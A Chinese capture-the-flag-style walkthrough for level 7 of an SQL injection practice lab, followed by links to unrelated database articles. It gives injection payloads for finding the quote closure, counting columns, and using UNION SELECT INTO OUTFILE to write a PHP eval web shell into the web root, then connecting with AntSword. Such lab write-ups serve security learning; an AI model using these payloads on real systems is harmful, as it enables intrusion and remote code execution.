SQL靶场第七关攻略

一.判断闭合点

闭合点为?id=1'))--+

二.判断列数

输入?id=1')) order by 3--+页面正常

输入?id=1')) order by 4--+页面异常,说明有3列

这里显示让我们用outfile来打这关,那我们先了解一下outfile:

用法:select 列名 from table [where语句] into outfile '目标文件'

三.写入木马文件

输入?id=-1')) union select 1,2,3 into outfile "D:/phpstudy/phpstudy_pro/WWW/1.txt"--+测试一下是否能把文件写进去

在这里发现写进来以后,就可以写我们的木马文件

输入?id=-1')) union select 1,2,'<?php eval($_post['cmd'])?>' into outfile "D:/phpstudy/phpstudy_pro/WWW/1.php"--+

这样就把我们的木马文件写进来了,我们打开蚁剑连接

连上蚁剑就获得了他的数据库的管理权限了,以上就是第七关的通关攻略

相关推荐
GDAL43 分钟前
Node.js v22.5+ 官方 SQLite 模块全解析:从入门到实战
数据库·sqlite·node.js
DCTANT2 小时前
【原创】国产化适配-全量迁移MySQL数据到OpenGauss数据库
java·数据库·spring boot·mysql·opengauss
程序员岳焱3 小时前
Java 与 MySQL 性能优化:MySQL全文检索查询优化实践
后端·mysql·性能优化
喜欢敲代码的程序员4 小时前
SpringBoot+Mybatis+MySQL+Vue+ElementUI前后端分离版:项目搭建(一)
spring boot·mysql·elementui·vue·mybatis
AI、少年郎4 小时前
Oracle 进阶语法实战:从多维分析到数据清洗的深度应用(第四课)
数据库·oracle
赤橙红的黄4 小时前
自定义线程池-实现任务0丢失的处理策略
数据库·spring
钢铁男儿4 小时前
C# 委托(调用带引用参数的委托)
java·mysql·c#
叁沐4 小时前
MySQL 02 日志系统:一条SQL更新语句是如何执行的?
mysql
DataGear4 小时前
如何在DataGear 5.4.1 中快速制作SQL服务端分页的数据表格看板
javascript·数据库·sql·信息可视化·数据分析·echarts·数据可视化
weixin_438335404 小时前
分布式锁实现方式:基于Redis的分布式锁实现(Spring Boot + Redis)
数据库·redis·分布式